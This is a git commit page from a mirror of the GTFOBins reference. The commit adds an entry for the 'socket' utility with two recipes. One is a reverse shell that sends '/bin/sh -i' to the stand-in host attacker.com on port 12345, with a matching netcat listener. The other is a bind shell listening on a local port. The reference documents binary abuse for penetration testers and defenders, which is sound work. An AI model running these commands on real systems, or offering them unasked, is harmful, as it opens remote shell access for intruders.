mirror of
https://github.com/GTFOBins/GTFOBins.github.io
synced 2024-12-24 13:59:17 +01:00
parent
24a9c55bee
commit
4baad5b113
14
_gtfobins/socket.md
Normal file
14
_gtfobins/socket.md
Normal file
@ -0,0 +1,14 @@
|
||||
---
|
||||
function:
|
||||
reverse-shell:
|
||||
- description: Run `nc -l -p 12345` on the attacker box to receive the shell.
|
||||
code: |
|
||||
RHOST=attacker.com
|
||||
RPORT=12345
|
||||
socket -qvp '/bin/sh -i' $RHOST $RPORT
|
||||
bind-shell:
|
||||
- description: Run `nc target.com 12345` on the attacker box to connect to the shell.
|
||||
code: |
|
||||
LPORT=12345
|
||||
socket -svp '/bin/sh -i' $LPORT
|
||||
---
|
Loading…
Reference in New Issue
Block a user